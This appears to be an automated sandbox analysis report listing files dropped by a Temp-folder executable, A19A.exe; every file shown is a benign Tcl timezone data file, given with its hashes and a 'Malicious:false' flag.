                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):262
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.450791926516311
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X5+L/Hm2OHlNndSvulvSQFFYc0FZFeVhvSQFFbBjvVFZFbGlvSQC:MBp5+L/HmdHlNnS6jz0F7KZjbBjVF7bd
                                                                                                                                                                                                                                                                                                                                MD5:040680E086764FC47EEBE039358E223C
                                                                                                                                                                                                                                                                                                                                SHA1:4D10E6F69835533748DD5FD2E7409F9732221210
                                                                                                                                                                                                                                                                                                                                SHA-256:C4054D56570F9362AB8FF7E4DBA7F8032720289AE01C03A861CCD8DEC9D2ABB2
                                                                                                                                                                                                                                                                                                                                SHA-512:FC00B4AD7328EBC3025A482B3D6A0B176F3430BD3D06B918974EAC5BD30AD8551E0C6BE1DC03BE18A9BC6DD0919ED2A3717E20749ABECBFBD202764047D0D292
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Mauritius) {. {-9223372036854775808 13800 0 LMT}. {-1988164200 14400 0 +04}. {403041600 18000 1 +04}. {417034800 14400 0 +04}. {1224972000 18000 1 +04}. {1238274000 14400 0 +04}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):180
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.778847657463255
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt+L6ELzO1h4DcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL+L/O1h4De
                                                                                                                                                                                                                                                                                                                                MD5:D89C649468B3C22CF5FA659AE590DE53
                                                                                                                                                                                                                                                                                                                                SHA1:83DF2C14F1E51F5B89DCF6B833E421389F9F23DC
                                                                                                                                                                                                                                                                                                                                SHA-256:071D17F347B4EB9791F4929803167497822E899761654053BD774C5A899B4B9C
                                                                                                                                                                                                                                                                                                                                SHA-512:68334E11AAB0F8DCEEB787429832A60F4F0169B6112B7F74048EACFDE78F9C4D100E1E2682D188C3965E41A83477D3AECC80B73A2A8A1A80A952E59B431576A8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Indian/Mayotte) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):146
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.933616581218054
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5+L6ELsActFkXGm2OHuU7oevUdvcUeNVsRYvC:SlSWB9X5+Lam2OHb7oezfNSQC
                                                                                                                                                                                                                                                                                                                                MD5:C50A592BB886F2FA48657900AE10789F
                                                                                                                                                                                                                                                                                                                                SHA1:16D73BFFDAD18E751968E100BB391AABB29169E1
                                                                                                                                                                                                                                                                                                                                SHA-256:3775EA8EBF5CBBD240E363FB62AEF8D2865A9D9969E40A15731DCC0AC03107EB
                                                                                                                                                                                                                                                                                                                                SHA-512:F875F287E6C3A7B7325DB038CF419AA34FD0072FD3FCD138102008959F397026B647D8D339CB01362330905382FE7DCF5F8EC98C9B8C4FFF59A6FF4E78678BB7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Reunion) {. {-9223372036854775808 13312 0 LMT}. {-1848886912 14400 0 +04}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):161
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.757854680369306
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8g5YFevFVAIgNqjNAt+XiMr4WFKBun:SlSWB9IZaM3yA5owFVAIgcjSt+Xvr4wh
                                                                                                                                                                                                                                                                                                                                MD5:848663FD5F685FE1E14C655A0ABA7D6A
                                                                                                                                                                                                                                                                                                                                SHA1:59A1BEE5B3BE01FB9D2C73777B7B4F1615DCE034
                                                                                                                                                                                                                                                                                                                                SHA-256:DB6D0019D3B0132EF8B8693B1AB2B325D77DE3DD371B1AFDAE4904BE610BA2A6
                                                                                                                                                                                                                                                                                                                                SHA-512:B1F8C08AF68C919DB332E6063647AF15CB9FED4046C16BEF9A58203044E36A0D1E69BD1B8703B15003B929409A8D83238B5AA67B910B920F0674C8A0EB5CF125
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Tehran)]} {. LoadTimeZoneFile Asia/Tehran.}.set TZData(:Iran) $TZData(:Asia/Tehran).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):172
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.778464205793726
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq85zFFwVAIgN0AzFzt+WXnMr4WFKYzFp:SlSWB9IZaM3yZbwVAIgCAb+zr4wKY7
                                                                                                                                                                                                                                                                                                                                MD5:B9D1F6BD0B0416791036C0E3402C8438
                                                                                                                                                                                                                                                                                                                                SHA1:E1A7471062C181B359C06804420091966B809957
                                                                                                                                                                                                                                                                                                                                SHA-256:E6EC28F69447C3D3DB2CB68A51EDCEF0F77FF4B563F7B65C9C71FF82771AA3E1
                                                                                                                                                                                                                                                                                                                                SHA-512:A5981FD91F6A9A84F44A6C9A3CF247F9BE3AB52CE5FE8EE1A7BE19DD63D0B22818BC15287FE73A5EEC8BCE6022B9EAF54A10AA719ADF31114E188F31EA273E92
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Jerusalem)]} {. LoadTimeZoneFile Asia/Jerusalem.}.set TZData(:Israel) $TZData(:Asia/Jerusalem).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):176
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.668645988954937
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx00EIECpVAIg200EIEvvt9S//2IAcGE0EIEVn:SlSWB9IZaM3y7952VAIgp95vF029095V
                                                                                                                                                                                                                                                                                                                                MD5:EA38E93941E21CB08AA49A023DCC06FB
                                                                                                                                                                                                                                                                                                                                SHA1:1AD77CAC25DC6D1D04320FF2621DD8E7D227ECBF
                                                                                                                                                                                                                                                                                                                                SHA-256:21908F008F08C55FB48F1C3D1A1B2016BDB10ED375060329451DE4E487CF0E5F
                                                                                                                                                                                                                                                                                                                                SHA-512:D6F0684A757AD42B8010B80B4BE6542ADE96D140EC486B4B768E167502C776B8D289622FBC48BD19EB3D0B3BC4156715D5CCFC7952A479A990B07935B15D26DC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Jamaica)]} {. LoadTimeZoneFile America/Jamaica.}.set TZData(:Jamaica) $TZData(:America/Jamaica).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):159
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.791469556628492
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8aowVAIgNqaF9hM7/4WFK6n:SlSWB9IZaM3ypwVAIgcaF4r4wK6n
                                                                                                                                                                                                                                                                                                                                MD5:338A18DEDF5A813466644B2AAE1A7CF5
                                                                                                                                                                                                                                                                                                                                SHA1:BB76CE671853780F4971D2E173AE71E82EA24690
                                                                                                                                                                                                                                                                                                                                SHA-256:535AF1A79CD01735C5D6FC6DB08C5B0EAFB8CF0BC89F7E943CF419CFA745CA26
                                                                                                                                                                                                                                                                                                                                SHA-512:4D44CC28D2D0634200FEA0537EBC5DD50E639365B89413C6BF911DC2B95B78E27F1B92733FB859C794A8C027EA89E45E8C2D6E1504FF315AF68DB02526226AD2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Tokyo)]} {. LoadTimeZoneFile Asia/Tokyo.}.set TZData(:Japan) $TZData(:Asia/Tokyo).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):184
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.759848173726549
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqTQG1/EOM2wFVAIgObT1/EOM8O68/FMKpUDH1/EOMi:SlSWB9IZaM3yc1EiwFVAIgOb1E48xME+
                                                                                                                                                                                                                                                                                                                                MD5:A9C8CA410CA3BD4345BF6EAB53FAB97A
                                                                                                                                                                                                                                                                                                                                SHA1:57AE7E6D3ED855B1FBF6ABF2C9846DFA9B3FFF47
                                                                                                                                                                                                                                                                                                                                SHA-256:A63A99F0E92F474C4AA99293C4F4182336520597A86FCDD91DAE8B25AFC30B98
                                                                                                                                                                                                                                                                                                                                SHA-512:C97CF1301DCEEE4DE26BCEEB60545BB70C083CD2D13ED89F868C7856B3532473421599ED9E7B166EA53A9CF44A03245192223D47BC1104CEBD1BF0AC6BF10898
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Kwajalein)]} {. LoadTimeZoneFile Pacific/Kwajalein.}.set TZData(:Kwajalein) $TZData(:Pacific/Kwajalein).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):171
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.779409803819657
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsbKJqYkdVAIgNGEnKJuYvW67beDcbKJ9n:SlSWB9IZaM3y7JdVAIgNTnYvW6PeD9n
                                                                                                                                                                                                                                                                                                                                MD5:C4739F7B58073CC7C72EF2D261C05C5E
                                                                                                                                                                                                                                                                                                                                SHA1:12FE559CA2FEA3F8A6610B1D4F43E299C9FB7BA5
                                                                                                                                                                                                                                                                                                                                SHA-256:28A94D9F1A60980F8026409A65F381EDB7E5926A79D07562D28199B6B63AF9B4
                                                                                                                                                                                                                                                                                                                                SHA-512:B2DC5CB1AD7B6941F498FF3D5BD6538CAF0ED19A2908DE645190A5C5F40AF5B34752AE8A83E6C50D370EA619BA969C9AB7F797F171192200CDA1657FFFB7F05A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Tripoli)]} {. LoadTimeZoneFile Africa/Tripoli.}.set TZData(:Libya) $TZData(:Africa/Tripoli).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7471
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7115445412724797
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:TJOwNDgaXSgm7VTslzZBYxWq9beN6db6yq3BgLjx1uuE0KRPGdNjClOQuonZ2ltb:bSV7xxWq9aYdbsC/eLdGLg9a
                                                                                                                                                                                                                                                                                                                                MD5:2F62D867C8605730BC8E43D300040D54
                                                                                                                                                                                                                                                                                                                                SHA1:06AD982DF03C7309AF01477749BAB9F7ED8935A7
                                                                                                                                                                                                                                                                                                                                SHA-256:D6C70E46A68B82FFC7A4D96FDA925B0FAAF973CB5D3404A55DFF2464C3009173
                                                                                                                                                                                                                                                                                                                                SHA-512:0D26D622511635337E5C03D82435A9B4A9BCA9530F940A70A24AE67EA4794429A5D68B59197B978818BEF0799C3D5FA792F5720965291661ED067570BC56226B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:MET) {. {-9223372036854775808 3600 0 MET}. {-1693706400 7200 1 MEST}. {-1680483600 3600 0 MET}. {-1663455600 7200 1 MEST}. {-1650150000 3600 0 MET}. {-1632006000 7200 1 MEST}. {-1618700400 3600 0 MET}. {-938905200 7200 1 MEST}. {-857257200 3600 0 MET}. {-844556400 7200 1 MEST}. {-828226800 3600 0 MET}. {-812502000 7200 1 MEST}. {-796777200 3600 0 MET}. {-781052400 7200 1 MEST}. {-766623600 3600 0 MET}. {228877200 7200 1 MEST}. {243997200 3600 0 MET}. {260326800 7200 1 MEST}. {276051600 3600 0 MET}. {291776400 7200 1 MEST}. {307501200 3600 0 MET}. {323830800 7200 1 MEST}. {338950800 3600 0 MET}. {354675600 7200 1 MEST}. {370400400 3600 0 MET}. {386125200 7200 1 MEST}. {401850000 3600 0 MET}. {417574800 7200 1 MEST}. {433299600 3600 0 MET}. {449024400 7200 1 MEST}. {465354000 3600 0 MET}. {481078800 7200 1 MEST}. {496803600 3600 0 MET
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):106
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.856431808856169
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx56xwkXGm2OHrXV4fvYv:SlSWB9X562m2OHrCi
                                                                                                                                                                                                                                                                                                                                MD5:FF6BDAC2C77D8287B46E966480BFEACC
                                                                                                                                                                                                                                                                                                                                SHA1:4C90F910C74E5262A27CC65C3433D34B5D885243
                                                                                                                                                                                                                                                                                                                                SHA-256:FB6D9702FC9FB82779B4DA97592546043C2B7D068F187D0F79E23CB5FE76B5C2
                                                                                                                                                                                                                                                                                                                                SHA-512:CA197B25B36DD47D86618A4D39BFFB91FEF939BC02EEB96679D7EA88E5D38737D3FE6BD4FD9D16C31CA5CF77D17DC31E5333F4E28AB777A165050EA5A4D106BA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:MST) {. {-9223372036854775808 -25200 0 MST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8227
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.755606924782105
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:xG5c2sGm+4I1zXN+C2mWBNQMsmNTxf6AeO+cblX:12dVUC2mWBNwWTxyWR
                                                                                                                                                                                                                                                                                                                                MD5:2AB5643D8EF9FD9687A5C67AEB04AF98
                                                                                                                                                                                                                                                                                                                                SHA1:2E8F1DE5C8113C530E5E6C10064DEA4AE949AAE6
                                                                                                                                                                                                                                                                                                                                SHA-256:97028B43406B08939408CB1DD0A0C63C76C9A352AEA5F400CE6D4B8D3C68F500
                                                                                                                                                                                                                                                                                                                                SHA-512:72A8863192E14A4BD2E05C508F8B376DD75BB4A3625058A97BBB33F7200B2012D92D445982679E0B7D11C978B80F7128B3A79B77938CEF6315AA6C4B1E0AC09C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:MST7MDT) {. {-9223372036854775808 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {126694800 -21600 1 MDT}. {152092800 -25200 0 MST}. {162378000 -21600 1 MDT}. {183542400 -25200 0 MST}. {199270800 -21600 1 MDT}. {215596800 -25200 0 MST}. {230720400 -21600 1 MDT}. {247046400 -25200 0 MST}. {262774800 -21600 1 MDT}. {278496000 -252
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):185
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.836487818373659
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0qfSwVAIg20qfo6AdMSKBbh4IAcGEqfu:SlSWB9IZaM3y7eHVAIgpeo68K5h490eu
                                                                                                                                                                                                                                                                                                                                MD5:C3AEEA7B991B609A1CB253FDD5057D11
                                                                                                                                                                                                                                                                                                                                SHA1:0212056C2A20DD899FA4A26B10C261AB19D20AA4
                                                                                                                                                                                                                                                                                                                                SHA-256:599F79242382ED466925F61DD6CE59192628C7EAA0C5406D3AA98EC8A5162824
                                                                                                                                                                                                                                                                                                                                SHA-512:38094FD29B1C31FC9D894B8F38909DD9ED3A76B2A27F6BC250ACD7C1EFF4529CD0B29B66CA7CCBEB0146DFF3FF0AC4AEEEC422F7A93422EF70BF723D12440A93
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Tijuana)]} {. LoadTimeZoneFile America/Tijuana.}.set TZData(:Mexico/BajaNorte) $TZData(:America/Tijuana).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):186
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.841665860441288
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0zjRJ+vFVAIg20zjRJZvt6AdMPCoQIAcGEzjRJ3:SlSWB9IZaM3y7zjRJQFVAIgpzjRJ1t6n
                                                                                                                                                                                                                                                                                                                                MD5:89A5ED35215BA46C76BF2BD5ED620031
                                                                                                                                                                                                                                                                                                                                SHA1:26F134644023A2D0DA4C8997C54E36C053AA1060
                                                                                                                                                                                                                                                                                                                                SHA-256:D624945E20F30CCB0DB2162AD3129301E5281B8868FBC05ACA3AA8B6FA05A9DF
                                                                                                                                                                                                                                                                                                                                SHA-512:C2563867E830F7F882E393080CE16A62A0CDC5841724E0D507CBA362DB8363BB75034986107C2428243680FE930BAC226E11FE6BA99C31E0C1A35D6DD1C14676
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Mazatlan)]} {. LoadTimeZoneFile America/Mazatlan.}.set TZData(:Mexico/BajaSur) $TZData(:America/Mazatlan).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):195
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8300311016675606
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7zBDdVAIgpzBy6BXl490zBw:MBaIMYzipzU6Bi90zi
                                                                                                                                                                                                                                                                                                                                MD5:E771850BA5A1C218EB1B31FDC564DF02
                                                                                                                                                                                                                                                                                                                                SHA1:3675838740B837A96FF32694D1FA56DE01DE064F
                                                                                                                                                                                                                                                                                                                                SHA-256:06A45F534B35538F32A77703C6523CE947D662D136C5EC105BD6616922AEEB44
                                                                                                                                                                                                                                                                                                                                SHA-512:BD7AF307AD61C310EDAF01E618BE9C1C79239E0C8CDEC85792624A7CCE1B6251B0ADE066B8610AFDB0179F3EF474503890642284800B81E599CB830EC6C7C9AA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Mexico_City)]} {. LoadTimeZoneFile America/Mexico_City.}.set TZData(:Mexico/General) $TZData(:America/Mexico_City).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):174
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8398862338201765
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqTQG/u4pVAIgObT/NCxL5E1nUDH/uvn:SlSWB9IZaM3ycqIVAIgOboLivn
                                                                                                                                                                                                                                                                                                                                MD5:7B274C782E9FE032AC4B3E137BF147BB
                                                                                                                                                                                                                                                                                                                                SHA1:8469D17EC75D0580667171EFC9DE3FDF2C1E0968
                                                                                                                                                                                                                                                                                                                                SHA-256:2228231C1BEF0173A639FBC4403B6E5BF835BF5918CC8C16757D915A392DBF75
                                                                                                                                                                                                                                                                                                                                SHA-512:AE72C1F244D9457C70A120FD00F2C0FC2BDC467DBD5C203373291E00427499040E489F2B1358757EA281BA8143E28FB54D03EDE67970F74DACFCB308AC7F74CE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Auckland)]} {. LoadTimeZoneFile Pacific/Auckland.}.set TZData(:NZ) $TZData(:Pacific/Auckland).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):176
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.832832776993659
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqTQG9WQ+DdVAIgObT9WQrF5AmtBFB/pUDH9WQpn:SlSWB9IZaM3ycwQ+DdVAIgObwQ5zzJjA
                                                                                                                                                                                                                                                                                                                                MD5:C8D83C210169F458683BB35940E11DF6
                                                                                                                                                                                                                                                                                                                                SHA1:278546F4E33AD5D0033AF6768EFAB0DE247DA74F
                                                                                                                                                                                                                                                                                                                                SHA-256:CECF81746557F6F957FEF12DBD202151F614451F52D7F6A35C72B830075C478D
                                                                                                                                                                                                                                                                                                                                SHA-512:4539AE6F7AF7579C3AA5AE4DEB97BD14ED83569702D3C4C3945DB06A2D8FFF260DA1DB21FF21B0BED91EE9C993833D471789B3A99C9A2986B7AC8ABFBBE5A8B7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Chatham)]} {. LoadTimeZoneFile Pacific/Chatham.}.set TZData(:NZ-CHAT) $TZData(:Pacific/Chatham).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):172
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.80475858956378
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx06RGFwVAIg206RAO0L5vf1+IAcGE6Ru:SlSWB9IZaM3y7+SwVAIgp+iLpd+90+u
                                                                                                                                                                                                                                                                                                                                MD5:38C56298E75306F39D278F60B50711A6
                                                                                                                                                                                                                                                                                                                                SHA1:8FD9CEAD17CCD7D981CEF4E782C3916BFEF2D11F
                                                                                                                                                                                                                                                                                                                                SHA-256:E10B8574DD83C93D3C49E9E2226148CBA84538802316846E74DA6004F1D1534D
                                                                                                                                                                                                                                                                                                                                SHA-512:F6AA67D78A167E553B97F092CC3791B591F800A6D286BE37C06F7ECABDFBCF43A397AEDC6E3EB9EB6A1CB95E8883D4D4F97890CA1877930AFCD5643B0C8548E9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Denver)]} {. LoadTimeZoneFile America/Denver.}.set TZData(:Navajo) $TZData(:America/Denver).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):166
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.854287452296565
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8qvwVAIgNtAnL75h4WFKdv:SlSWB9IZaM3yMwVAIgEH5h4wKt
                                                                                                                                                                                                                                                                                                                                MD5:AF9DD8961DB652EE1E0495182D99820D
                                                                                                                                                                                                                                                                                                                                SHA1:979602E3C59719A67DE3C05633242C12E0693C43
                                                                                                                                                                                                                                                                                                                                SHA-256:9A6109D98B35518921E4923B50053E7DE9B007372C5E4FFF75654395D6B56A82
                                                                                                                                                                                                                                                                                                                                SHA-512:F022C3EFABFC3B3D3152C345ACD28387FFEA4B61709CBD42B2F3684D33BED469C4C25F2328E5E7D9D74D968E25A0419E7BCFF0EB55650922906B9D3FF57B06C8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Shanghai)]} {. LoadTimeZoneFile Asia/Shanghai.}.set TZData(:PRC) $TZData(:Asia/Shanghai).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
